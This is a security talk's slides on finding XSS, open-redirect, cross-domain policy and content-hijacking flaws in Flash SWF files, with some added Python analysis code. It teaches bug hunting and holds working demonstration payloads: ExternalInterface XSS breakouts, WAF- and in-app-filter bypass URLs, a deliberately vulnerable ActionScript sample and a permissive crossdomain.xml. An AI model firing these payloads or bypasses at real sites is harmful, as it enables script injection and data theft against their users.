 https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
♦ Catch-up on Flash XSS exploitation
 https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-bypassing-the-guardians-part-1/
 https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-part-2-navigatetourl-and-jar-protocol/
 https://soroush.secproject.com/blog/2014/01/catch-up-on-flash-xss-exploitation-part-3-xss-by-embedding-a-flash-file/
© NCC Group 41

More Related Content

PPTX
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
PDF
Ruxmon feb 2013 what happened to rails
PDF
Entomology 101
PDF
Pwning mobile apps without root or jailbreak
PDF
Hacking Adobe Experience Manager sites
PDF
Silent web app testing by example - BerlinSides 2011
PDF
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
PDF
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Ruxmon feb 2013 what happened to rails
Entomology 101
Pwning mobile apps without root or jailbreak
Hacking Adobe Experience Manager sites
Silent web app testing by example - BerlinSides 2011
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013

What's hot (20)

PDF
I got 99 trends and a # is all of them
PPTX
Client-side JavaScript Vulnerabilities
PDF
DevOops & How I hacked you DevopsDays DC June 2015
PDF
Ruxmon cve 2012-2661
PDF
Defcon CTF quals
PPTX
Javascript Security - Three main methods of defending your MEAN stack
PPTX
Vulnerabilities in data processing levels
PDF
Lie to Me: Bypassing Modern Web Application Firewalls
PDF
Racing The Web - Hackfest 2016
PPTX
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
PDF
Ln monitoring repositories
PDF
Defending Against Application DoS attacks
PDF
Finding Needles in Haystacks
PDF
Hunting for security bugs in AEM webapps
PPTX
Adventures in Asymmetric Warfare
PDF
Legal and efficient web app testing without permission
PDF
Owasp tds
PPTX
DevOOPS: Attacks and Defenses for DevOps Toolchains
PDF
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
PDF
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
I got 99 trends and a # is all of them
Client-side JavaScript Vulnerabilities
DevOops & How I hacked you DevopsDays DC June 2015
Ruxmon cve 2012-2661
Defcon CTF quals
Javascript Security - Three main methods of defending your MEAN stack
Vulnerabilities in data processing levels
Lie to Me: Bypassing Modern Web Application Firewalls
Racing The Web - Hackfest 2016
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Ln monitoring repositories
Defending Against Application DoS attacks
Finding Needles in Haystacks
Hunting for security bugs in AEM webapps
Adventures in Asymmetric Warfare
Legal and efficient web app testing without permission
Owasp tds
DevOOPS: Attacks and Defenses for DevOps Toolchains
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Ad

Similar to Flash it baby! (20)

PPTX
Java Web Security Class
PPT
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
PDF
OSCP Preparation Guide @ Infosectrain
PPTX
CodeIgniter i18n Security Flaw
PDF
Something wicked this way comes - CONFidence
PDF
Be ef presentation-securitybyte2011-michele_orru
PPSX
Attacking HTML5
PDF
Krzysztof kotowicz. something wicked this way comes
PDF
2017-07-22 Common Workflow Language Viewer
PPTX
Anatomy of a Drupal Hack - TechKnowFile 2014
PDF
Appenginejs (old presentation)
PPT
Same Origin Policy Weaknesses
PPTX
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
PPTX
An introduction to php shells
PDF
Problems with parameters b sides-msp
KEY
HTML5와 모바일
PDF
Attack Chaining: Advanced Maneuvers for Hack Fu
PPTX
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
PPT
Hacking The World With Flash
Java Web Security Class
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
OSCP Preparation Guide @ Infosectrain
CodeIgniter i18n Security Flaw
Something wicked this way comes - CONFidence
Be ef presentation-securitybyte2011-michele_orru
Attacking HTML5
Krzysztof kotowicz. something wicked this way comes
2017-07-22 Common Workflow Language Viewer
Anatomy of a Drupal Hack - TechKnowFile 2014
Appenginejs (old presentation)
Same Origin Policy Weaknesses
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
An introduction to php shells
Problems with parameters b sides-msp
HTML5와 모바일
Attack Chaining: Advanced Maneuvers for Hack Fu
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
Hacking The World With Flash
Ad

Recently uploaded (20)

PDF
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
PPTX
innovation process that make everything different.pptx
PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
PDF
RPKI Status Update, presented by Makito Lay at IDNOG 10
PDF
Paper PDF World Game (s) Great Redesign.pdf
DOCX
Unit-3 cyber security network security of internet system
PPTX
Introduction about ICD -10 and ICD11 on 5.8.25.pptx
PPTX
Digital Literacy And Online Safety on internet
PDF
An introduction to the IFRS (ISSB) Stndards.pdf
PPTX
Introduction to Information and Communication Technology
PPTX
Internet___Basics___Styled_ presentation
PDF
APNIC Update, presented at PHNOG 2025 by Shane Hermoso
PPTX
Slides PPTX World Game (s) Eco Economic Epochs.pptx
PPTX
Job_Card_System_Styled_lorem_ipsum_.pptx
PDF
How to Ensure Data Integrity During Shopify Migration_ Best Practices for Sec...
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
PPTX
E -tech empowerment technologies PowerPoint
PPTX
Introuction about ICD -10 and ICD-11 PPT.pptx
PDF
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
PDF
The New Creative Director: How AI Tools for Social Media Content Creation Are...
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
innovation process that make everything different.pptx
INTERNET------BASICS-------UPDATED PPT PRESENTATION
RPKI Status Update, presented by Makito Lay at IDNOG 10
Paper PDF World Game (s) Great Redesign.pdf
Unit-3 cyber security network security of internet system
Introduction about ICD -10 and ICD11 on 5.8.25.pptx
Digital Literacy And Online Safety on internet
An introduction to the IFRS (ISSB) Stndards.pdf
Introduction to Information and Communication Technology
Internet___Basics___Styled_ presentation
APNIC Update, presented at PHNOG 2025 by Shane Hermoso
Slides PPTX World Game (s) Eco Economic Epochs.pptx
Job_Card_System_Styled_lorem_ipsum_.pptx
How to Ensure Data Integrity During Shopify Migration_ Best Practices for Sec...
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
E -tech empowerment technologies PowerPoint
Introuction about ICD -10 and ICD-11 PPT.pptx
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
The New Creative Director: How AI Tools for Social Media Content Creation Are...

Flash it baby!

  • 1. Flash it baby! Finding vulnerabilities in SWF files (v2.0)
  • 2. whoami ♦ Security consultant at NCCGroup ♦ +10 years in web application security ♦ Researcher and bug hunter (I am trying to be?!) ♦ @irsdl ♦ https://soroush.secproject.com/blog/ © NCC Group 2
  • 3. Flash Isn’t Quite DeadYet! ♦ They ignore it, they laugh at it, but they have to fight it! ♦ They may not use it, but probably have it! ♦ SWF in JS libraries, HTMLWYSIWYG editors, Players in CMSes, … ♦ XSS is XSS no matter where it is! © NCC Group 3
  • 4. What’s on the MenuToday? ♦ Assumptions:  Client-side web application issues  SWF files in browsers via a website (not local with file system nor AIR apps) ♦ Excluded:  Making a website vulnerable by uploading a Flash file  Exploiting a website by creating a reflected Flash file (e.g. Rosetta Flash)  Attacking server-side  Nudity!!! © NCC Group 4
  • 5. Introduction ♦ ActionScript is based on ECMAScript 😍 ♦ .SWF -> A compiled Flash file (binary) ->We care about this ❤ ♦ Versions: 1 and 2 ;then 3 to supports object oriented designs 💞 © NCC Group 5
  • 6. Embedding into a HTML Page ♦ Embedded via OBJECT or EMBED tags  Example with OBJECT:  Example with EMBED: ♦ “OBJECT” can accept “allowScriptAccess” as attribute -> Not IE ♦ Use “TYPE” when content-type is different ♦ “classid”, “codetype” -> obsoleted since HTML5 ♦ “allowScriptAccess=always” to communicate with HTML! ♦ “allowScriptAccess=samedomain” is default! © NCC Group 6 <object type="application/x-shockwave-flash" data="file.swf"> <param name="movie" value="file.swf" /> <param name="FlashVars" value="param1=value1&p2=v2" /> <param name="allowscriptaccess" value="always" /> </object> <embed src="file.swf" type="application/x-shockwave-flash" allowScriptAccess="always" FlashVars="param1=value1&p2=v2">
  • 7. Bug Hunting Strategy ♦ Finding Flash Files  Google… filetype:swf site:example.com  Download open source apps/libs  Search in contents for SWF  Search similar open source projects for SWF ♦ Search for known issues ♦ Automated testing ♦ Manual testing ♦ Note: Is it eligible in bug bounty?  e.g.: https://hackerone.com/yahoo © NCC Group 7
  • 8. WhatType of Issues? ♦ Insecure crossdomain.xml ♦ CVE-2011-2461 – still Alive! ♦ Vulnerabilities in SWF Files  Cross-site scripting (XSS)  Cross-site data hijacking (XSDH?)  Same Origin Method Execution (SOME)  Open redirections (doesn’t have a fancy name!)  Information disclosure - credentials, hidden URLs, etc.  Spoofing/Defacement via loading remote objects  Storing sensitive data on the client-side  Log forging (not really important most of the times) © NCC Group 8
  • 9. Insecure crossdomain.xml ♦ Least restrictive policy: ♦ “crossdomain.xml” instead of “clientaccesspolicy.xml” for Silverlight:  The most secure one is insecure! © NCC Group 9 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross- domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" secure="false"/> <allow-http-request-headers-from domain="*" headers="*" secure="false"/> </cross-domain-policy> <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross- domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" headers="SOAPAction" secure="true"> </cross-domain-policy>
  • 10. Content Hijacking PoCTool ♦ Cross-Site Content Hijacking (XSCH) PoC:  https://github.com/nccgroup/CrossSiteContentHijacking  E.g.: https://query.yahooapis.com/crossdomain.xml © NCC Group 10
  • 11. CVE-2011-2461 -The Dead is Alive! ♦ Flex SDK issue (between 3.x and 4.5.1) ♦ A new input to load external SWF files ♦ Attacks:  Same-Origin Request Forgery  Cross-Site Content Hijacking ♦ Found by Mauro Gentile (@sneak_) & Luca Carettoni © NCC Group 11
  • 12. Finding CVE-2011-2461 ♦ ParrotNG to the rescue!  with Burp Suite extension (passive scan)!  Make sure it is working properly -> Important ;-)  Only scan .swf extensions!  Can search a folder ♦ Decompile & Search:  In “mx.modules.ModuleManager”  Patched version may have “&& false == true” ♦ Cross-SiteContent Hijacking (XSCH) PoC :  https://github.com/nccgroup/CrossSiteContentHijacking © NCC Group 12 Security.sandboxType == Security.REMOTE)
  • 13. CVE-2011-2461 Exploitation PoC ♦ “wonderwheel7.swf” was hosted on Google.com originally ♦ ParrotNG detected the issue: ♦ e.g: Hijacking contents from “0me.me” by “15.rs”:  https://15.rs/ContentHijacking/ContentHijackingLoader.html?objfile=https://0me. me/demo/cve-2011-2461/wonderwheel7.swf&objtype=cve-2011- 2461&target=https://0me.me/secret.txt&logmode=result&isauto=1 © NCC Group 13
  • 14. Important: Do Not Reinvent theWheel! ♦ Search for known vulnerabilities  e.g.: https://web.archive.org/web/20130730223443/http://web.appsec.ws/FlashExploit Database.php ♦ Search their issue tracker for security issues ♦ Old exploits may still be valid with a few changes! © NCC Group 14
  • 15. AutomatedTesting Listed in OWASP Flash Security Project: ♦ FlashDiggity  Decompile -> Search using RegEx  Extractable Rules: http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt  Had problems with AS3 during test ♦ HP SWFScan (Part of HP WebInspect)  DecompileAS2 & 3 -> Search using RegEx  Has module exclusion rules  Stand-alone is old otherwise commercial ♦ HP Fortify  Scan AS3, Flex3 & 4 using source code (not SWF)  Commercial © NCC Group 15
  • 16. Updated SWFIntruder + ♦ Updated SWFIntruder:  Dirty fix for the original SWFIntruder  Uses several payloads for each input parameter  Can detect most of AS2 FlashVars  FlashVars should be declared for AS3  Good to find XSS without user interaction  Runs in a browser – can be slow  Can be extended by you! https://github.com/irsdl/updated-SWFIntruder ♦ FlashBang  Runs in a browser  Based on Mozilla's Shumway  Easy way to identify FlashVars (just has some bugs!)  https://github.com/cure53/flashbang © NCC Group 16
  • 17. Try it on! Homework! ♦ http://0me.me/swfintruder/testSWF/  http://0me.me/swfintruder/testSWF/clickTagSample.swf  http://0me.me/swfintruder/testSWF/fileuploader.swf  http://0me.me/swfintruder/testSWF/Vulnerable.swf © NCC Group 17
  • 18. ManualTesting ♦ Preparing testing environment ♦ CompilingActionScript files ♦ Decompiling SWF files ♦ Finding inputs (sources) ♦ Finding usage of dangerous functions (sinks) ♦ Reviewing the logic, finding sensitive strings, reversing, etc. © NCC Group 18
  • 19. Preparing the Environment (Windows) ♦ Download the Flash debugger version:  https://www.adobe.com/support/flashplayer/downloads.html Windows: ♦ Modify the “mm.cfg” file in %userprofile%  e.g. c:usersmyusermm.cfg  Default log file location inWindows (policy file is there too): © NCC Group 19 ErrorReportingEnable=1 TraceOutputFileEnable=1 MaxWarnings=50 PolicyFileLog=1 PolicyFileLogAppend=1 # AS3Trace=1 # To see more! %userprofile%AppDataRoamingMacromediaFlash PlayerLogsflashlog.txt
20. Compiling HelloXSSWorld.as
♦ Free recommended IDEs:
 FDT (similar to Eclipse) (preferred for simpler projects)
 FlashDevelop (includes a powerful runtime debugger)
♦ + Flex SDK and Java
♦ Code sample (vulnerable to open redirect and XSS):

package {
    import flash.net.navigateToURL;
    import flash.net.URLRequest;
    import flash.display.Sprite;

    public class HelloFlashWorld extends Sprite {
        // User input: HelloFlashWorld.swf?target=foo
        private var url : String = root.loaderInfo.parameters.target;

        public function HelloFlashWorld() {
            var request : URLRequest = new URLRequest(url);
            try {
                // redirect to the target URL (no validation of the scheme or host)
                navigateToURL(request);
            } catch (e : Error) {
                // handle error here
            }
        }
    }
}
21. Decompiling a SWF File
♦ Recommended decompiler: JPEXS Free Flash Decompiler
 Easy to use UI
 Can edit SWF files
 Occasional updates
 Another Java based tool! Can be slow and it might crash, but still good!
 https://www.free-decompiler.com/flash/
 https://github.com/jindrapetrik/jpexs-decompiler
22. Decompiled, Now What?
♦ AS1/2 or AS3?
 http://dev.sitedaniel.com/swfinfo/swfinfo.swf - added to Updated SWFIntruder
♦ Find input parameters (sources)
 Find their usage
♦ Find interesting/sensitive functions (sinks)
 Check their inputs
♦ Identify insecure policies
 Any interesting behaviour?
♦ Identify sensitive data or hidden URLs
 Can lead to server-side issues (more serious issues)
♦ Identify storage and logging issues
 Cookies and logs
23. Input Parameters - Sources
♦ Finding a “source”:
 Look at the HTML page (DOM viewer)
 Find similar inputs based on a known input parameter
 AS3 (variables need to be defined):
  Search for: “root”, “loaderInfo”, “parameters”
  e.g. root.loaderInfo.parameters.inputName
 AS2 (variables can be undefined):
  Search for: “_root”, “_global”, “_level0”
  Any undefined variable! Use the Flash debugger log file!

AS3 regex:
\.(root|loaderInfo|parameters)[^\w]|[^\w](root|loaderInfo|parameters)\.
AS2 regex:
\.(_root|_global|_level0)[^\w]|[^\w](_root|_global|_level0)\.
Debugger log line for an undefined AS2 variable:
Warning: Reference to undeclared variable, 'inputName'
24. Sinks
♦ Sinks - find usage of sensitive functions
 Can run JavaScript:
  AS3: “ExternalInterface.call”, “navigateToURL”
  AS2: “getURL”, “fscommand”
  “.htmlText”
 Can load objects, or send/receive/store data:
  “XMLLoader”, “AMFService”, “SWFLoader”, “loadVariables”, “loadMovie”, “loadMovieNum”, “LoadVars.load”, “LoadVars.send”, “NetStream.play”, “getDefinition”, “FScrollPane.loadScrollContent”, “XML.load”, “Sound.loadSound”, “URLRequest”, “URLLoader”, “URLStream”, “LocalConnection”, “SharedObject”
 Can run Flash functions from JavaScript:
  “ExternalInterface.addCallback” (AS3), “.watch” (AS2)
  Important with an insecure “Security.allowDomain”
♦ No sensitive function = less likely to find a good vulnerability
25. Source <-> Sink Flow!
♦ Tainted source --> … --> sink!
♦ Sink <-- … <-- tainted source!
♦ Any validation?
 What is allowed?
 Is it good enough?
♦ Any logic?
 Do some inputs have to be set for something to happen?
 Role of any provided external file/URL
26. Insecure Policies in SWF Files
♦ Search for “allowDomain” and “allowInsecureDomain”
♦ Security.allowDomain: cross-domain communication
 The SWF can be scripted by another SWF file on another domain
 HTML (JavaScript) from another domain can communicate with the SWF
♦ Security.allowInsecureDomain: HTTP to HTTPS communication
 HTTPS communication to HTTP is fine
♦ LocalConnection’s Security.allowDomain
 SWF/AIR can communicate with another SWF/AIR
Not an issue if there is no interesting functionality!
27. Sensitive Data / Hidden URLs / Gems!
♦ Think like a forensic analyst! Search for:
 URLs
 Emails
 Secret keys and passwords
 Database information
 Etc.
♦ FlashDiggity rules are good:
 http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt
28. Sensitive Data in Storage!
♦ “SharedObjects” for Flash cookies!
 Can even store binary
♦ “trace” function for logging in debug mode
 Can make debugging easier
 Sensitive data ends up in log files when the debugger version is used
29. Find More! Be Creative!
♦ Always look at the FlashVars parameter names
 Anything called “onload”, “onclick”, or “redirect”?
♦ Does it load another file when you open it? Find it, abuse it!
♦ Does it accept external configuration files?
 Find a valid config file and manipulate it
 Example: XSS issue in FlowPlayer: https://github.com/flowplayer/flash/issues/263
30. “ExternalInterface.call” XSS Confusion!
♦ Accepts a JS function name and its parameters
♦ Both can lead to XSS
♦ The first parameter can be simple JavaScript code (the name of the JS function)
♦ The next parameter (argument) is escaped:
 " turns into \" → all good!
 \ doesn't turn into \\ → too bad!
 So \" can be used to run JS code, e.g. \"))-alert('XSS')}catch(e){}//
 See http://mihai.bazon.net/blog/externalinterface-is-unreliable
♦ Debuggable using the browser’s console – cause an error:
 xxx"'(){}"'(){}'"(){}xxx
31. Bypassing Client Side Protections
♦ Protections on the client side only make it more user friendly
 Not good for security!
♦ Find the responsible function in the source code
 Understand how it works, find the credentials, and bypass it!
 Change the code and save it to bypass the protections
32. More Issues…
♦ Identify and review the sensitive functions
 Such as login or encryption functions
♦ Flash files can contain unused/commented server side code and information
♦ Identify the requests it sends to the server
 Can lead to finding broken access controls on the server side
♦ Examples:
 Testing an online game?
 Can you go to the next level without playing?
 Does it use encryption?
 Are there any keys stored in the application?
33. FlashVars Tips!
♦ Passing parameters in the URL:
 File.swf?param1=value1&p2=v2
♦ Invalid encoding is removed:
 param1=value1 -> pa%Xram1=val%Yue1
 param1=value1 -> pa%=ram1=val%#ue1
 param1=value1 -> pa%AXram1=val%B#ue1
♦ Sending parameters after “#” is dead? Nope!
 File.swf?%#param1=value1&p2=v2
♦ In redirection, %7f-%FF converts to “?”
♦ BOM (byte-order-mark) “%EF%BB%BF” = a SPACE char!
♦ Flash in Firefox may not like %00
34. Examples
♦ Bypassing firewalls – the firewall was detecting “domid=”:
 https://example.com/foobar/ScrollLine2D.swf?%#domid=%22))}catch(e){};alert(%27External%20Interface%20XSS%20from:%20%27%2bdocument.domain)//&registerwithjs=1
♦ Bypassing an in-app protection – it didn’t like inputs from GET:
 /flashmediaelement.swf?jsinitfunctio%gn=alert`1`

The in-app check that the second example bypasses (it drops every FlashVar whose name also appears in the query string):
pos = root.loaderInfo.url.indexOf('?');
if (pos !== -1) {
    query = parseStr(root.loaderInfo.url.substr(pos + 1));
    for (var key:String in params) {
        if (query.hasOwnProperty(trim(key))) {
            delete params[key];
        }
    }
}
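Both bypasses come from a parser differential: the player decodes FlashVars leniently (slide 33), so the parameter names a WAF or an in-app check sees are not the names the SWF sees (and, for the %# trick, the browser never sends the fragment to the server at all). The following Python is an added example, not from the talk; it models that decoding with a rule generalised from the slide's examples (an assumption: %XX decodes, % followed by a non-hex char drops two characters, % followed by one hex and one non-hex char drops three) and diffs the result against a strict parser.

```python
import re
from urllib.parse import parse_qs

_HEX = re.compile(r"[0-9A-Fa-f]")

def flash_decode(s: str) -> str:
    """Decode one FlashVars token the lenient way slide 33 describes. Assumed rule,
    generalised from the slide's examples: %XX with two hex digits decodes; '%' +
    non-hex drops two chars; '%' + hex + non-hex drops three chars."""
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] != "%":
            out += s[i].encode("utf-8")
            i += 1
            continue
        pair = s[i + 1:i + 3]
        if len(pair) == 2 and _HEX.match(pair[0]) and _HEX.match(pair[1]):
            out.append(int(pair, 16))   # valid %XX
            i += 3
        elif len(pair) == 2 and _HEX.match(pair[0]):
            i += 3                      # e.g. %AX or %B# -> dropped
        else:
            i += 2                      # e.g. %X, %#, %= -> dropped
    return out.decode("utf-8", errors="replace")

def flash_vars(query: str) -> dict:
    """Split a query into FlashVars as the player would, decoding each key and
    value with flash_decode. '#' gets no special treatment: slide 33 shows that
    parameters after '%#' still reach the SWF."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[flash_decode(key)] = flash_decode(value)
    return params

def keys_missed_by_strict_parser(query: str) -> set:
    """Parameter names the SWF will see that a filter using strict percent-decoding
    (urllib's parse_qs here) sees under a different name, or not at all: the gap
    the slide 34 bypasses rely on."""
    strict = set(parse_qs(query, keep_blank_values=True))
    return set(flash_vars(query)) - strict

if __name__ == "__main__":
    for q in ("pa%Xram1=val%Yue1", "%#domid=1", "jsinitfunctio%gn=alert`1`"):
        print(q, "->", flash_vars(q), "missed:", keys_missed_by_strict_parser(q))
```

A filter that wants to see what the SWF sees has to normalise with the same rules first; matching the raw query string is not enough.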
35. Demo – Finding Vulnerabilities!
♦ clickTagSample.swf
 ActionScript 2
♦ vulnerable.swf
 ActionScript 2
♦ Homework:
♦ fileuploader.swf
 ActionScript 3
♦ Answer (in white colour): ?flashButton=:"))-alert('XSS')}catch(e){}//;
♦ You are ready with more practice!
36. Used RegExes in Demo
AS3 inputs:
\.(root|loaderInfo|parameters)[^\w]|[^\w](root|loaderInfo|parameters)\.
AS2 inputs (remember undefined inputs – follow the sinks):
\.(_root|_global|_level0)[^\w]|[^\w](_root|_global|_level0)\.
XSS:
(getURL|ExternalInterface.call|navigateToURL|.htmlText)
Sensitive functions:
(XMLLoader|AMFService|SWFLoader|loadVariables|loadMovie|loadMovieNum|LoadVars.load|LoadVars.send|NetStream.play|getDefinition|FScrollPane.loadScrollContent|XML.load|Sound.loadSound|URLRequest|URLLoader|URLStream|LocalConnection|SharedObject)
Interesting keywords:
(allowInsecureDomain|allowDomain|ExternalInterface|load|xml|sql|url|flashvar|pass|TextField|encr)
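As an added example (not from the talk), the source and sink regexes of slides 23, 24 and 36 applied in Python to decompiled ActionScript, with a naive intra-file taint trace that surfaces the source -> sink flows slide 25 asks you to look for; the assignment heuristic is an assumption, and the sample input is the HelloFlashWorld class from slide 20.

```python
import re

# Regexes from slide 36 (backslashes restored where the slide lost them).
SOURCES = {
    "AS3 source": r"\.(root|loaderInfo|parameters)[^\w]|[^\w](root|loaderInfo|parameters)\.",
    "AS2 source": r"\.(_root|_global|_level0)[^\w]|[^\w](_root|_global|_level0)\.",
}
SINKS = {
    "XSS sink": r"(getURL|ExternalInterface.call|navigateToURL|.htmlText)",
    "load/store sink": r"(XMLLoader|AMFService|SWFLoader|loadVariables|loadMovie|loadMovieNum|"
                       r"LoadVars.load|LoadVars.send|NetStream.play|getDefinition|FScrollPane.loadScrollContent|"
                       r"XML.load|Sound.loadSound|URLRequest|URLLoader|URLStream|LocalConnection|SharedObject)",
}
# Assumed binding heuristic: "var name : Type = rhs" or "name = rhs" (not ==, !==).
ASSIGN = re.compile(r"(?:var\s+)?(\w+)\s*(?::\s*\w+)?\s*=(?!=)\s*(.*)")

def _uses(names, text):
    return any(re.search(rf"\b{re.escape(n)}\b", text) for n in names)

def scan(source):
    """(hits, flows): hits = (line, [rules], text) per source/sink match (the grep
    step of slides 23/24); flows = sink lines using a source-tainted name, a naive
    intra-file version of the slide 25 trace (no control flow, no validation check)."""
    tainted, hits, flows = set(), [], []
    for n, raw in enumerate(source.splitlines(), 1):
        code = raw.split("//")[0]                       # drop trailing comments
        kinds = [k for k, p in {**SOURCES, **SINKS}.items() if re.search(p, code)]
        if kinds:
            hits.append((n, kinds, raw.strip()))
        if any(k in SINKS for k in kinds) and _uses(tainted, code):
            flows.append((n, raw.strip()))
        m = ASSIGN.search(code)
        if m:
            rhs = " " + m.group(2)                      # pad so [^\w] can match at the start
            if any(re.search(p, rhs) for p in SOURCES.values()) or _uses(tainted, rhs):
                tainted.add(m.group(1))
    return hits, flows

# Constructed sample: the vulnerable HelloFlashWorld class from slide 20.
SAMPLE = """import flash.net.navigateToURL;
import flash.net.URLRequest;
public class HelloFlashWorld extends Sprite {
  // User input: HelloFlashWorld.swf?target=foo
  private var url : String = root.loaderInfo.parameters.target;
  public function HelloFlashWorld() {
    var request : URLRequest = new URLRequest(url);
    try { navigateToURL(request); } catch (e : Error) { }
  }
}"""
```

Run `scan(open("Decompiled.as").read())` on JPEXS output; the import lines show up as sink hits (the regexes are just greps), while only the `URLRequest(url)` and `navigateToURL(request)` lines are reported as flows.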
37. Final Notes
♦ Search your proxy logs for “SWF” files!
♦ JS libraries and plugins can contain Flash files
♦ It can be slow – don’t panic! Plan ahead!
♦ Review the API references for any security-related functions:
 AS2: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/2/
 AS3: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/
♦ The following resource is also recommended for code review:
 http://www.hpenterprisesecurity.com/vulncat/en/vulncat/index.html
♦ Flash files can send requests to their server during testing!
♦ Downloading random Flash files is dangerous but fun
 We all know why!
38. Thank you! Questions? Really? Why?! ;)
♦ Sample files in: https://github.com/irsdl/Flash-Files-Vulnerability-Database
39. References & Further Reading - 1
♦ Securely deploying cross-domain policy files
 http://blogs.adobe.com/security/2009/11/securely_deploying_cross-domai.html
♦ Related to the Flash policy file
 http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html
♦ Security Domains, Application Domains, and More in ActionScript 3.0
 http://www.senocular.com/flash/tutorials/contentdomains/
♦ Penetration testers guide
 http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen-tester-guide/
♦ Exploiting CVE-2011-2461 on google.com
 http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html
♦ AS3 hidden treasure in the mm.cfg file
 https://jpauclair.net/2010/02/10/mmcfg-treasure/
40. References & Further Reading - 2
♦ ParrotNG project to find CVE-2011-2461 vulnerable files
 https://github.com/ikkisoft/ParrotNG
♦ Testing for Cross site flashing
 https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)
♦ Blinded by Flash: Widespread Security Risks Flash Developers Don’t See
 https://www.blackhat.com/presentations/bh-dc-09/Jagdale/BlackHat-DC-09-Jagdale-Blinded-by-Flash.pdf
♦ SWF INFO: WIDTH, HEIGHT, SWF VERSION, ACTIONSCRIPT VERSION, FRAMERATE
 http://blog.sitedaniel.com/2009/11/swf-info-width-height-swf-version-actionscript-version-framerate/
♦ Creating more secure SWF web applications
 http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html
♦ OWASP Flash Security Project
 https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project
41. References & Further Reading - 3
♦ Same Origin Method Execution (SOME)
 http://www.benhayak.com/2015/06/same-origin-method-execution-some.html
♦ WordPress SOME bug in plupload.flash.swf
 https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
♦ Catch-up on Flash XSS exploitation
 https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-bypassing-the-guardians-part-1/
 https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-part-2-navigatetourl-and-jar-protocol/
 https://soroush.secproject.com/blog/2014/01/catch-up-on-flash-xss-exploitation-part-3-xss-by-embedding-a-flash-file/